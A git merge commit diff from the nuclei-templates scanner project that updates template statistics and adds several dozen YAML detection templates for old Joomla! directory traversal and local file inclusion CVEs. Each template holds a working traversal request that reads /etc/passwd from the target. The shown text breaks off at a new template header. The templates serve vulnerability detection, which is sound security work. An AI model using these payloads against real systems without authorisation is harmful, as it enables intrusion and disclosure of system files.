Merge branch 'master' of https://github.com/projectdiscovery/nuclei-templates into CVE-2021-1497
commit
aec246bf5b
|
@ -1,9 +1,6 @@
|
|||
name: 🗒 Templates Stats
|
||||
|
||||
on:
|
||||
create:
|
||||
tags:
|
||||
- v*
|
||||
workflow_dispatch:
|
||||
|
||||
jobs:
|
||||
|
|
22
README.md
22
README.md
|
@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags,
|
|||
|
||||
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|
||||
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
|
||||
| cve | 725 | pikpikcu | 273 | cves | 725 | info | 643 | http | 1965 |
|
||||
| lfi | 260 | dhiyaneshdk | 258 | vulnerabilities | 301 | high | 553 | file | 46 |
|
||||
| panel | 248 | daffainfo | 213 | exposed-panels | 247 | medium | 448 | network | 41 |
|
||||
| xss | 244 | pdteam | 195 | technologies | 191 | critical | 273 | dns | 12 |
|
||||
| exposure | 231 | geeknik | 152 | exposures | 188 | low | 152 | | |
|
||||
| wordpress | 223 | dwisiswant0 | 131 | misconfiguration | 136 | | | | |
|
||||
| rce | 198 | gy741 | 72 | takeovers | 64 | | | | |
|
||||
| tech | 181 | pussycat0x | 67 | default-logins | 56 | | | | |
|
||||
| cve2020 | 164 | madrobot | 61 | file | 46 | | | | |
|
||||
| wp-plugin | 149 | princechaddha | 61 | workflows | 36 | | | | |
|
||||
| cve | 804 | daffainfo | 280 | cves | 804 | info | 661 | http | 2068 |
|
||||
| lfi | 325 | pikpikcu | 277 | vulnerabilities | 311 | high | 621 | file | 46 |
|
||||
| xss | 253 | dhiyaneshdk | 268 | exposed-panels | 250 | medium | 463 | network | 43 |
|
||||
| panel | 252 | pdteam | 199 | technologies | 200 | critical | 275 | dns | 12 |
|
||||
| wordpress | 241 | geeknik | 154 | exposures | 188 | low | 154 | | |
|
||||
| exposure | 233 | dwisiswant0 | 131 | misconfiguration | 136 | | | | |
|
||||
| rce | 200 | gy741 | 77 | takeovers | 64 | | | | |
|
||||
| tech | 191 | pussycat0x | 70 | default-logins | 56 | | | | |
|
||||
| wp-plugin | 167 | princechaddha | 63 | file | 46 | | | | |
|
||||
| cve2020 | 164 | madrobot | 61 | workflows | 37 | | | | |
|
||||
|
||||
**166 directories, 2144 files**.
|
||||
**166 directories, 2231 files**.
|
||||
|
||||
</td>
|
||||
</tr>
|
||||
|
|
File diff suppressed because one or more lines are too long
1609
TEMPLATES-STATS.md
1609
TEMPLATES-STATS.md
File diff suppressed because it is too large
Load Diff
18
TOP-10.md
18
TOP-10.md
|
@ -1,12 +1,12 @@
|
|||
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|
||||
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
|
||||
| cve | 739 | pikpikcu | 273 | cves | 739 | info | 650 | http | 1991 |
|
||||
| lfi | 266 | dhiyaneshdk | 268 | vulnerabilities | 307 | high | 560 | file | 46 |
|
||||
| panel | 252 | daffainfo | 217 | exposed-panels | 250 | medium | 456 | network | 42 |
|
||||
| xss | 248 | pdteam | 195 | technologies | 192 | critical | 276 | dns | 12 |
|
||||
| wordpress | 235 | geeknik | 154 | exposures | 188 | low | 154 | | |
|
||||
| cve | 804 | daffainfo | 280 | cves | 804 | info | 661 | http | 2068 |
|
||||
| lfi | 325 | pikpikcu | 277 | vulnerabilities | 311 | high | 621 | file | 46 |
|
||||
| xss | 253 | dhiyaneshdk | 268 | exposed-panels | 250 | medium | 463 | network | 43 |
|
||||
| panel | 252 | pdteam | 199 | technologies | 200 | critical | 275 | dns | 12 |
|
||||
| wordpress | 241 | geeknik | 154 | exposures | 188 | low | 154 | | |
|
||||
| exposure | 233 | dwisiswant0 | 131 | misconfiguration | 136 | | | | |
|
||||
| rce | 200 | gy741 | 76 | takeovers | 64 | | | | |
|
||||
| tech | 183 | pussycat0x | 69 | default-logins | 56 | | | | |
|
||||
| cve2020 | 164 | princechaddha | 61 | file | 46 | | | | |
|
||||
| wp-plugin | 161 | madrobot | 61 | workflows | 37 | | | | |
|
||||
| rce | 200 | gy741 | 77 | takeovers | 64 | | | | |
|
||||
| tech | 191 | pussycat0x | 70 | default-logins | 56 | | | | |
|
||||
| wp-plugin | 167 | princechaddha | 63 | file | 46 | | | | |
|
||||
| cve2020 | 164 | madrobot | 61 | workflows | 37 | | | | |
|
||||
|
|
|
@ -1,14 +1,19 @@
|
|||
id: deprecated-sshv1-detection
|
||||
id: CVE-2001-1473
|
||||
|
||||
info:
|
||||
name: Deprecated SSHv1 Protocol Detection
|
||||
author: iamthefrogy
|
||||
severity: medium
|
||||
tags: network,ssh,openssh
|
||||
severity: high
|
||||
tags: network,ssh,openssh,cves,cves2001
|
||||
description: SSHv1 is deprecated and has known cryptographic issues.
|
||||
reference:
|
||||
- https://www.kb.cert.org/vuls/id/684820
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2001-1473
|
||||
classification:
|
||||
cvss-score: 7.4
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N
|
||||
cve-id: CVE-2001-1473
|
||||
cwe-id: CWE-310
|
||||
|
||||
network:
|
||||
- host:
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2007-4504
|
||||
|
||||
info:
|
||||
name: Joomla! Component RSfiles 1.0.2 - 'path' File Download
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in index.php in the RSfiles component (com_rsfiles) 1.0.2 and earlier for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the path parameter in a files.display action.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/4307
|
||||
- https://www.cvedetails.com/cve/CVE-2007-4504
|
||||
tags: cve,cve2007,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_rsfiles&task=files.display&path=../../../../../../../../../etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2008-6080
|
||||
|
||||
info:
|
||||
name: Joomla! Component ionFiles 4.4.2 - File Disclosure
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in download.php in the ionFiles (com_ionfiles) 4.4.2 component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/6809
|
||||
- https://www.cvedetails.com/cve/CVE-2008-6080
|
||||
tags: cve,cve2008,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/components/com_ionfiles/download.php?file=../../../../../../../../etc/passwd&download=1"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2008-6222
|
||||
|
||||
info:
|
||||
name: Joomla! Component ProDesk 1.0/1.2 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the Pro Desk Support Center (com_pro_desk) component 1.0 and 1.2 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the include_file parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/6980
|
||||
- https://www.cvedetails.com/cve/CVE-2008-6222
|
||||
tags: cve,cve2008,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_pro_desk&include_file=../../../../../../etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2009-1496
|
||||
|
||||
info:
|
||||
name: Joomla! Component Cmimarketplace - 'viewit' Directory Traversal
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the Cmi Marketplace (com_cmimarketplace) component 0.1 for Joomla! allows remote attackers to list arbitrary directories via a .. (dot dot) in the viewit parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/8367
|
||||
- https://www.cvedetails.com/cve/CVE-2009-1496
|
||||
tags: cve,cve2009,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_cmimarketplace&Itemid=70&viewit=/../../../../../../etc/passwd&cid=1"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2009-2015
|
||||
|
||||
info:
|
||||
name: Joomla! Component MooFAQ (com_moofaq) - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in includes/file_includer.php in the Ideal MooFAQ (com_moofaq) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/8898
|
||||
- https://www.cvedetails.com/cve/CVE-2009-2015
|
||||
tags: cve,cve2009,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/components/com_moofaq/includes/file_includer.php?gzip=0&file=/../../../../../etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2009-2100
|
||||
|
||||
info:
|
||||
name: Joomla! Component com_Projectfork 2.0.10 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the JoomlaPraise Projectfork (com_projectfork) component 2.0.10 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the section parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/8946
|
||||
- https://www.cvedetails.com/cve/CVE-2009-2100
|
||||
tags: cve,cve2009,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_projectfork§ion=../../../../../../../../etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2009-3053
|
||||
|
||||
info:
|
||||
name: Joomla! Component Agora 3.0.0b (com_agora) - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the Agora (com_agora) component 3.0.0b for Joomla! allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the action parameter to the avatars page, reachable through index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/9564
|
||||
- https://www.cvedetails.com/cve/CVE-2009-3053
|
||||
tags: cve,cve2009,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2009-3318
|
||||
|
||||
info:
|
||||
name: Joomla! Component com_album 1.14 - Directory Traversal
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the Roland Breedveld Album (com_album) component 1.14 for Joomla! allows remote attackers to access arbitrary directories and have unspecified other impact via a .. (dot dot) in the target parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/9706
|
||||
- https://www.cvedetails.com/cve/CVE-2009-3318
|
||||
tags: cve,cve2009,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_album&Itemid=128&target=../../../../../../../../../etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2009-4202
|
||||
|
||||
info:
|
||||
name: Joomla! Component Omilen Photo Gallery 0.5b - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the Omilen Photo Gallery (com_omphotogallery) component Beta 0.5 for Joomla! allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/8870
|
||||
- https://www.cvedetails.com/cve/CVE-2009-4202
|
||||
tags: cve,cve2009,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_omphotogallery&controller=../../../../../../../../../etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2009-4679
|
||||
|
||||
info:
|
||||
name: Joomla! Component iF Portfolio Nexus - 'Controller' Remote File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the inertialFATE iF Portfolio Nexus (com_if_nexus) component 1.5 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference: |
|
||||
- https://www.exploit-db.com/exploits/33440
|
||||
- https://www.cvedetails.com/cve/CVE-2009-4679
|
||||
tags: cve,cve2009,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_kif_nexus&controller=../../../../../../../../../etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2010-0157
|
||||
|
||||
info:
|
||||
name: Joomla! Component com_biblestudy - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the Bible Study (com_biblestudy) component 6.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter in a studieslist action to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/10943
|
||||
- https://www.cvedetails.com/cve/CVE-2010-0157
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_biblestudy&id=1&view=studieslist&controller=../../../../../../../../etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,32 @@
|
|||
id: CVE-2010-0467
|
||||
|
||||
info:
|
||||
name: Joomla! Component CCNewsLetter - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: medium
|
||||
description: Directory traversal vulnerability in the ccNewsletter (com_ccnewsletter) component 1.0.5 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter in a ccnewsletter action to index.php.
|
||||
reference: |
|
||||
- https://www.exploit-db.com/exploits/11282
|
||||
- https://www.cvedetails.com/cve/CVE-2010-0467
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N
|
||||
cvss-score: 5.80
|
||||
cve-id: CVE-2010-0467
|
||||
cwe-id: CWE-22
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_ccnewsletter&controller=../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2010-0696
|
||||
|
||||
info:
|
||||
name: Joomla! Component Jw_allVideos - Arbitrary File Download
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in includes/download.php in the JoomlaWorks AllVideos (Jw_allVideos) plugin 3.0 through 3.2 for Joomla! allows remote attackers to read arbitrary files via a ./../.../ (modified dot dot) in the file parameter.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/11447
|
||||
- https://www.cvedetails.com/cve/CVE-2010-0696
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/plugins/content/jw_allvideos/includes/download.php?file=../../../../../../../../etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2010-0759
|
||||
|
||||
info:
|
||||
name: Joomla! Plugin Core Design Scriptegrator - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php in the Core Design Scriptegrator plugin 1.4.1 for Joomla! allows remote attackers to read, and possibly include and execute, arbitrary files via directory traversal sequences in the files[] parameter.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/11498
|
||||
- https://www.cvedetails.com/cve/CVE-2010-0759
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files[]=/etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2010-0942
|
||||
|
||||
info:
|
||||
name: Joomla! Component com_jvideodirect - Directory Traversal
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the jVideoDirect (com_jvideodirect) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/11089
|
||||
- https://www.cvedetails.com/cve/CVE-2010-0942
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_jvideodirect&controller=../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2010-0972
|
||||
|
||||
info:
|
||||
name: Joomla! Component com_gcalendar Suite 2.1.5 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the GCalendar (com_gcalendar) component 2.1.5 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/11738
|
||||
- https://www.cvedetails.com/cve/CVE-2010-0972
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_gcalendar&controller=../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2010-0982
|
||||
|
||||
info:
|
||||
name: Joomla! Component com_cartweberp - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the CARTwebERP (com_cartweberp) component 1.56.75 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/10942
|
||||
- https://www.cvedetails.com/cve/CVE-2010-0982
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_cartweberp&controller=../../../../../../../../etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2010-1056
|
||||
|
||||
info:
|
||||
name: Joomla! Component com_rokdownloads - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the RokDownloads (com_rokdownloads) component before 1.0.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/11760
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1056
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_rokdownloads&controller=../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2010-1081
|
||||
|
||||
info:
|
||||
name: Joomla! Component com_communitypolls 1.5.2 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the Community Polls (com_communitypolls) component 1.5.2, and possibly earlier, for Core Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/11511
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1081
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_communitypolls&controller=../../../../../../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2010-1217
|
||||
|
||||
info:
|
||||
name: Joomla! Component & Plugin JE Tooltip 1.0 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the JE Form Creator (com_jeformcr) component for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via directory traversal sequences in the view parameter to index.php. NOTE the original researcher states that the affected product is JE Tooltip, not Form Creator; however, the exploit URL suggests that Form Creator is affected.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/11814
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1217
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_jeformcr&view=../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2010-1302
|
||||
|
||||
info:
|
||||
name: Joomla! Component DW Graph - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in dwgraphs.php in the DecryptWeb DW Graphs (com_dwgraphs) component 1.0 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/11978
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1302
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_dwgraphs&controller=../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2010-1340
|
||||
|
||||
info:
|
||||
name: Joomla! Component com_jresearch - 'Controller' Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in jresearch.php in the J!Research (com_jresearch) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/33797
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1340
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_jresearch&controller=../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2010-1461
|
||||
|
||||
info:
|
||||
name: Joomla! Component Photo Battle 1.0.1 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the Photo Battle (com_photobattle) component 1.0.1 for Joomla! allows remote attackers to read arbitrary files via the view parameter to index.php.
|
||||
reference: |
|
||||
- https://www.exploit-db.com/exploits/12232
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1461
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_photobattle&view=../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2010-1469
|
||||
|
||||
info:
|
||||
name: Joomla! Component JProject Manager 1.0 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the Ternaria Informatica JProject Manager (com_jprojectmanager) component 1.0 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference: |
|
||||
- https://www.exploit-db.com/exploits/12146
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1469
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_jprojectmanager&controller=../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2010-1478
|
||||
|
||||
info:
|
||||
name: Joomla! Component Jfeedback 1.2 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the Ternaria Informatica Jfeedback! (com_jfeedback) component 1.2 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
|
||||
reference: |
|
||||
- https://www.exploit-db.com/exploits/12145
|
||||
- https://www.cvedetails.com/cve/CVE-2010-1478
|
||||
tags: cve,cve2010,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_jfeedback&controller=../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2010-1491
|
||||
|
||||
info:
|
||||
